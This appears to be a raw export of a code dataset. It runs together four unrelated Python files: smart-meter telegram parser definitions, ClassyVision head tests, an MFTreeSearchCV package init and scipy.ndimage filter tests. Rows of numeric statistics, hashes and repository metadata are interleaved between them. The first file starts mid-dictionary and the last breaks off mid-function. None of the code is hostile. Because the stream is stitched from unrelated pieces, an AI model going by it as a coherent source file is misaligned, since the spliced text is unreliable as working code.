obis.INSTANTANEOUS_CURRENT_L1: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_CURRENT_L2: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_CURRENT_L3: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L1_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L2_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L3_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L1_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L2_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L3_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
obis.HOURLY_GAS_METER_READING: MBusParser(
ValueParser(timestamp),
ValueParser(Decimal)
)
}
}
V5 = {
'checksum_support': True,
'objects': {
obis.P1_MESSAGE_HEADER: CosemParser(ValueParser(str)),
obis.P1_MESSAGE_TIMESTAMP: CosemParser(ValueParser(timestamp)),
obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
obis.ELECTRICITY_IMPORTED_TOTAL: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
obis.LONG_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
obis.SHORT_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
obis.POWER_EVENT_FAILURE_LOG:
ProfileGenericParser(BUFFER_TYPES,
PG_HEAD_PARSERS,
PG_UNIDENTIFIED_BUFFERTYPE_PARSERS),
obis.VOLTAGE_SAG_L1_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SAG_L2_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SAG_L3_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L1_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L2_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L3_COUNT: CosemParser(ValueParser(int)),
obis.INSTANTANEOUS_VOLTAGE_L1: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_VOLTAGE_L2: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_VOLTAGE_L3: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_CURRENT_L1: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_CURRENT_L2: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_CURRENT_L3: CosemParser(ValueParser(Decimal)),
obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
obis.DEVICE_TYPE: CosemParser(ValueParser(int)),
obis.INSTANTANEOUS_ACTIVE_POWER_L1_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L2_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L3_POSITIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L1_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L2_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.INSTANTANEOUS_ACTIVE_POWER_L3_NEGATIVE: CosemParser(ValueParser(Decimal)),
obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
obis.HOURLY_GAS_METER_READING: MBusParser(
ValueParser(timestamp),
ValueParser(Decimal)
)
}
}
ALL = (V2_2, V3, V4, V5)
BELGIUM_FLUVIUS = deepcopy(V5)
BELGIUM_FLUVIUS['objects'].update({
obis.BELGIUM_HOURLY_GAS_METER_READING: MBusParser(
ValueParser(timestamp),
ValueParser(Decimal)
)
})
LUXEMBOURG_SMARTY = deepcopy(V5)
LUXEMBOURG_SMARTY['objects'].update({
obis.LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL: CosemParser(ValueParser(Decimal)),
obis.LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemParser(ValueParser(Decimal)),
})
| 51.177215
| 120
| 0.73485
| 818
| 8,086
| 6.937653
| 0.128362
| 0.321762
| 0.219736
| 0.244229
| 0.861145
| 0.823436
| 0.79859
| 0.783612
| 0.768987
| 0.727753
| 0
| 0.009691
| 0.170542
| 8,086
| 157
| 121
| 51.503185
| 0.83644
| 0.006307
| 0
| 0.721429
| 0
| 0
| 0.010593
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
136f743cf4a462b2a5d4ffac4ed3899fc4f59a93
| 2,744
|
py
|
Python
|
test/heads_fully_convolutional_linear_head_test.py
|
jerryzh168/ClassyVision-1
|
6acfb00a77487a9015803fbaad805330081293a9
|
[
"MIT"
] | 1
|
2020-04-13T03:50:26.000Z
|
2020-04-13T03:50:26.000Z
|
test/heads_fully_convolutional_linear_head_test.py
|
pkassotis/ClassyVision
|
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
|
[
"MIT"
] | null | null | null |
test/heads_fully_convolutional_linear_head_test.py
|
pkassotis/ClassyVision
|
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
|
[
"MIT"
] | 1
|
2020-08-24T22:45:49.000Z
|
2020-08-24T22:45:49.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import classy_vision.heads.fully_convolutional_linear_head as fcl
import torch
class TestFullyConvolutionalLinearHead(unittest.TestCase):
def test_fully_convolutional_linear_head(self):
head = fcl.FullyConvolutionalLinearHead(
"default_head",
num_classes=2,
in_plane=3,
pool_size=[1, 3, 3],
activation_func="softmax",
use_dropout=False,
)
input = torch.rand([1, 3, 4, 3, 3])
output = head(input)
self.assertEqual(output.shape, torch.Size([1, 8]))
def test_fully_convolutional_linear_head_eval(self):
head = fcl.FullyConvolutionalLinearHead(
"default_head",
num_classes=2,
in_plane=3,
pool_size=[1, 3, 3],
activation_func="softmax",
use_dropout=False,
).eval()
input = torch.rand([1, 3, 4, 3, 3])
output = head(input)
self.assertEqual(output.shape, torch.Size([1, 2]))
def test_fully_convolutional_linear_head_from_cfg(self):
head_cfg = {
"name": "fully_convolutional_linear",
"unique_id": "default_head",
"activation_func": "softmax",
"pool_size": [1, 3, 3],
"num_classes": 2,
"in_plane": 3,
"use_dropout": False,
}
head = fcl.FullyConvolutionalLinearHead.from_config(head_cfg)
input = torch.rand([1, 3, 4, 3, 3])
output = head(input)
self.assertEqual(output.shape, torch.Size([1, 8]))
def test_fully_convolutional_linear_head_adaptive_pool(self):
head = fcl.FullyConvolutionalLinearHead(
"default_head",
num_classes=2,
in_plane=3,
pool_size=None,
activation_func="softmax",
use_dropout=False,
)
input = torch.rand([1, 3, 4, 3, 3])
output = head(input)
self.assertEqual(output.shape, torch.Size([1, 2]))
def test_fully_convolutional_linear_head_adaptive_pool_from_cfg(self):
head_cfg = {
"name": "fully_convolutional_linear",
"unique_id": "default_head",
"activation_func": "softmax",
"num_classes": 2,
"in_plane": 3,
"use_dropout": False,
}
head = fcl.FullyConvolutionalLinearHead.from_config(head_cfg)
input = torch.rand([1, 3, 4, 3, 3])
output = head(input)
self.assertEqual(output.shape, torch.Size([1, 2]))
| 33.876543
| 74
| 0.591837
| 318
| 2,744
| 4.874214
| 0.242138
| 0.092903
| 0.123871
| 0.108387
| 0.809032
| 0.801935
| 0.779355
| 0.779355
| 0.763871
| 0.763871
| 0
| 0.028468
| 0.295918
| 2,744
| 80
| 75
| 34.3
| 0.77381
| 0.069242
| 0
| 0.761194
| 0
| 0
| 0.106709
| 0.0204
| 0
| 0
| 0
| 0
| 0.074627
| 1
| 0.074627
| false
| 0
| 0.044776
| 0
| 0.134328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13a00f4835c5055f585978228d89e0a3b0ee289e
| 129
|
py
|
Python
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 8
|
2019-10-24T22:27:10.000Z
|
2021-10-07T00:19:52.000Z
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 1
|
2021-03-16T23:20:54.000Z
|
2021-05-25T20:43:27.000Z
|
MFTreeSearchCV/__init__.py
|
rajatsen91/MFTreeSearchCV
|
cf5ef5f537267c1c2c34a4f40042a051aad434f9
|
[
"MIT"
] | 1
|
2020-07-21T21:18:58.000Z
|
2020-07-21T21:18:58.000Z
|
# Code for MFTreeSearchCV
# Contact: rajat.sen@utexas.edu
from __future__ import division
from __future__ import print_function
| 21.5
| 37
| 0.829457
| 17
| 129
| 5.764706
| 0.823529
| 0.204082
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124031
| 129
| 5
| 38
| 25.8
| 0.867257
| 0.410853
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
13aae7fdc034132b91cbd00fb2a7465936fb09e8
| 211,999
|
py
|
Python
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 1
|
2021-06-30T14:42:40.000Z
|
2021-06-30T14:42:40.000Z
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 5
|
2020-09-01T01:19:07.000Z
|
2021-10-11T01:06:05.000Z
|
scipy/ndimage/tests/test_ndimage.py
|
divenex/scipy
|
fe0e253165a73bdb922c4da6a107be0474ee60ac
|
[
"BSD-3-Clause"
] | 1
|
2018-04-21T11:45:55.000Z
|
2018-04-21T11:45:55.000Z
|
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import sys
import numpy
from numpy import fft
from numpy.testing import (assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_almost_equal,
suppress_warnings)
import pytest
from pytest import raises as assert_raises
import scipy.ndimage as ndimage
eps = 1e-12
def sumsq(a, b):
return math.sqrt(((a - b)**2).sum())
class TestNdimage:
def setup_method(self):
# list of numarray data types
self.integer_types = [
numpy.int8, numpy.uint8, numpy.int16, numpy.uint16,
numpy.int32, numpy.uint32, numpy.int64, numpy.uint64]
self.float_types = [numpy.float32, numpy.float64]
self.types = self.integer_types + self.float_types
# list of boundary modes:
self.modes = ['nearest', 'wrap', 'reflect', 'mirror', 'constant']
def test_correlate01(self):
array = numpy.array([1, 2])
weights = numpy.array([2])
expected = [2, 4]
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate01_overlap(self):
array = numpy.arange(256).reshape(16, 16)
weights = numpy.array([2])
expected = 2 * array
ndimage.correlate1d(array, weights, output=array)
assert_array_almost_equal(array, expected)
def test_correlate02(self):
array = numpy.array([1, 2, 3])
kernel = numpy.array([1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate03(self):
array = numpy.array([1])
weights = numpy.array([1, 1])
expected = [2]
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate04(self):
array = numpy.array([1, 2])
tcor = [2, 3]
tcov = [3, 4]
weights = numpy.array([1, 1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate05(self):
array = numpy.array([1, 2, 3])
tcor = [2, 3, 5]
tcov = [3, 5, 6]
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(tcov, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(tcov, output)
def test_correlate06(self):
array = numpy.array([1, 2, 3])
tcor = [9, 14, 17]
tcov = [7, 10, 15]
weights = numpy.array([1, 2, 3])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate07(self):
array = numpy.array([1, 2, 3])
expected = [5, 8, 11]
weights = numpy.array([1, 2, 1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, expected)
def test_correlate08(self):
array = numpy.array([1, 2, 3])
tcor = [1, 2, 5]
tcov = [3, 6, 7]
weights = numpy.array([1, 2, -1])
output = ndimage.correlate(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve(array, weights)
assert_array_almost_equal(output, tcov)
output = ndimage.correlate1d(array, weights)
assert_array_almost_equal(output, tcor)
output = ndimage.convolve1d(array, weights)
assert_array_almost_equal(output, tcov)
def test_correlate09(self):
array = []
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.correlate1d(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve1d(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate10(self):
array = [[]]
kernel = numpy.array([[1, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal(array, output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal(array, output)
def test_correlate11(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6]])
kernel = numpy.array([[1, 1],
[1, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal([[4, 6, 10], [10, 12, 16]], output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal([[12, 16, 18], [18, 22, 24]], output)
def test_correlate12(self):
array = numpy.array([[1, 2, 3],
[4, 5, 6]])
kernel = numpy.array([[1, 0],
[0, 1]])
output = ndimage.correlate(array, kernel)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
output = ndimage.convolve(array, kernel)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
def test_correlate13(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
for type2 in self.types:
output = ndimage.correlate(array, kernel, output=type2)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, type2)
output = ndimage.convolve(array, kernel,
output=type2)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, type2)
def test_correlate14(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
for type2 in self.types:
output = numpy.zeros(array.shape, type2)
ndimage.correlate(array, kernel,
output=output)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, type2)
ndimage.convolve(array, kernel, output=output)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, type2)
def test_correlate15(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate16(self):
kernel = numpy.array([[0.5, 0],
[0, 0.5]])
for type1 in self.types:
array = numpy.array([[1, 2, 3], [4, 5, 6]], type1)
output = ndimage.correlate(array, kernel, output=numpy.float32)
assert_array_almost_equal([[1, 1.5, 2.5], [2.5, 3, 4]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel, output=numpy.float32)
assert_array_almost_equal([[3, 4, 4.5], [4.5, 5.5, 6]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate17(self):
array = numpy.array([1, 2, 3])
tcor = [3, 5, 6]
tcov = [2, 3, 5]
kernel = numpy.array([1, 1])
output = ndimage.correlate(array, kernel, origin=-1)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve(array, kernel, origin=-1)
assert_array_almost_equal(tcov, output)
output = ndimage.correlate1d(array, kernel, origin=-1)
assert_array_almost_equal(tcor, output)
output = ndimage.convolve1d(array, kernel, origin=-1)
assert_array_almost_equal(tcov, output)
def test_correlate18(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32,
mode='nearest', origin=-1)
assert_array_almost_equal([[6, 8, 9], [9, 11, 12]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32,
mode='nearest', origin=-1)
assert_array_almost_equal([[2, 3, 5], [5, 6, 8]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate_mode_sequence(self):
kernel = numpy.ones((2, 2))
array = numpy.ones((3, 3), float)
with assert_raises(RuntimeError):
ndimage.correlate(array, kernel, mode=['nearest', 'reflect'])
with assert_raises(RuntimeError):
ndimage.convolve(array, kernel, mode=['nearest', 'reflect'])
def test_correlate19(self):
kernel = numpy.array([[1, 0],
[0, 1]])
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[4, 5, 6]], type1)
output = ndimage.correlate(array, kernel,
output=numpy.float32,
mode='nearest', origin=[-1, 0])
assert_array_almost_equal([[5, 6, 8], [8, 9, 11]], output)
assert_equal(output.dtype.type, numpy.float32)
output = ndimage.convolve(array, kernel,
output=numpy.float32,
mode='nearest', origin=[-1, 0])
assert_array_almost_equal([[3, 5, 6], [6, 8, 9]], output)
assert_equal(output.dtype.type, numpy.float32)
def test_correlate20(self):
weights = numpy.array([1, 2, 1])
expected = [[5, 10, 15], [7, 14, 21]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
output=output)
assert_array_almost_equal(output, expected)
def test_correlate21(self):
array = numpy.array([[1, 2, 3],
[2, 4, 6]])
expected = [[5, 10, 15], [7, 14, 21]]
weights = numpy.array([1, 2, 1])
output = ndimage.correlate1d(array, weights, axis=0)
assert_array_almost_equal(output, expected)
output = ndimage.convolve1d(array, weights, axis=0)
assert_array_almost_equal(output, expected)
def test_correlate22(self):
weights = numpy.array([1, 2, 1])
expected = [[6, 12, 18], [6, 12, 18]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='wrap', output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
mode='wrap', output=output)
assert_array_almost_equal(output, expected)
def test_correlate23(self):
weights = numpy.array([1, 2, 1])
expected = [[5, 10, 15], [7, 14, 21]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output)
assert_array_almost_equal(output, expected)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output)
assert_array_almost_equal(output, expected)
def test_correlate24(self):
weights = numpy.array([1, 2, 1])
tcor = [[7, 14, 21], [8, 16, 24]]
tcov = [[4, 8, 12], [5, 10, 15]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output, origin=-1)
assert_array_almost_equal(output, tcor)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output, origin=-1)
assert_array_almost_equal(output, tcov)
def test_correlate25(self):
weights = numpy.array([1, 2, 1])
tcor = [[4, 8, 12], [5, 10, 15]]
tcov = [[7, 14, 21], [8, 16, 24]]
for type1 in self.types:
array = numpy.array([[1, 2, 3],
[2, 4, 6]], type1)
for type2 in self.types:
output = numpy.zeros((2, 3), type2)
ndimage.correlate1d(array, weights, axis=0,
mode='nearest', output=output, origin=1)
assert_array_almost_equal(output, tcor)
ndimage.convolve1d(array, weights, axis=0,
mode='nearest', output=output, origin=1)
assert_array_almost_equal(output, tcov)
def test_correlate26(self):
# test fix for gh-11661 (mirror extension of a length 1 signal)
y = ndimage.convolve1d(numpy.ones(1), numpy.ones(5), mode='mirror')
assert_array_equal(y, numpy.array(5.))
y = ndimage.correlate1d(numpy.ones(1), numpy.ones(5), mode='mirror')
assert_array_equal(y, numpy.array(5.))
def test_gauss01(self):
input = numpy.array([[1, 2, 3],
[2, 4, 6]], numpy.float32)
output = ndimage.gaussian_filter(input, 0)
assert_array_almost_equal(output, input)
def test_gauss02(self):
input = numpy.array([[1, 2, 3],
[2, 4, 6]], numpy.float32)
output = ndimage.gaussian_filter(input, 1.0)
assert_equal(input.dtype, output.dtype)
assert_equal(input.shape, output.shape)
def test_gauss03(self):
# single precision data"
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
output = ndimage.gaussian_filter(input, [1.0, 1.0])
assert_equal(input.dtype, output.dtype)
assert_equal(input.shape, output.shape)
# input.sum() is 49995000.0. With single precision floats, we can't
# expect more than 8 digits of accuracy, so use decimal=0 in this test.
assert_almost_equal(output.sum(dtype='d'), input.sum(dtype='d'),
decimal=0)
assert_(sumsq(input, output) > 1.0)
def test_gauss04(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output = ndimage.gaussian_filter(input, [1.0, 1.0], output=otype)
assert_equal(output.dtype.type, numpy.float64)
assert_equal(input.shape, output.shape)
assert_(sumsq(input, output) > 1.0)
def test_gauss05(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output = ndimage.gaussian_filter(input, [1.0, 1.0],
order=1, output=otype)
assert_equal(output.dtype.type, numpy.float64)
assert_equal(input.shape, output.shape)
assert_(sumsq(input, output) > 1.0)
def test_gauss06(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
otype = numpy.float64
output1 = ndimage.gaussian_filter(input, [1.0, 1.0], output=otype)
output2 = ndimage.gaussian_filter(input, 1.0, output=otype)
assert_array_almost_equal(output1, output2)
def test_gauss_memory_overlap(self):
input = numpy.arange(100 * 100).astype(numpy.float32)
input.shape = (100, 100)
output1 = ndimage.gaussian_filter(input, 1.0)
ndimage.gaussian_filter(input, 1.0, output=input)
assert_array_almost_equal(output1, input)
def test_prewitt01(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 1)
output = ndimage.prewitt(array, 0)
assert_array_almost_equal(t, output)
def test_prewitt02(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 1)
output = numpy.zeros(array.shape, type_)
ndimage.prewitt(array, 0, output)
assert_array_almost_equal(t, output)
def test_prewitt03(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 1)
t = ndimage.correlate1d(t, [1.0, 1.0, 1.0], 0)
output = ndimage.prewitt(array, 1)
assert_array_almost_equal(t, output)
def test_prewitt04(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.prewitt(array, -1)
output = ndimage.prewitt(array, 1)
assert_array_almost_equal(t, output)
def test_sobel01(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 1)
output = ndimage.sobel(array, 0)
assert_array_almost_equal(t, output)
def test_sobel02(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 0)
t = ndimage.correlate1d(t, [1.0, 2.0, 1.0], 1)
output = numpy.zeros(array.shape, type_)
ndimage.sobel(array, 0, output)
assert_array_almost_equal(t, output)
def test_sobel03(self):
for type_ in self.types:
array = numpy.array([[3, 2, 5, 1, 4],
[5, 8, 3, 7, 1],
[5, 6, 9, 3, 5]], type_)
t = ndimage.correlate1d(array, [-1.0, 0.0, 1.0], 1)
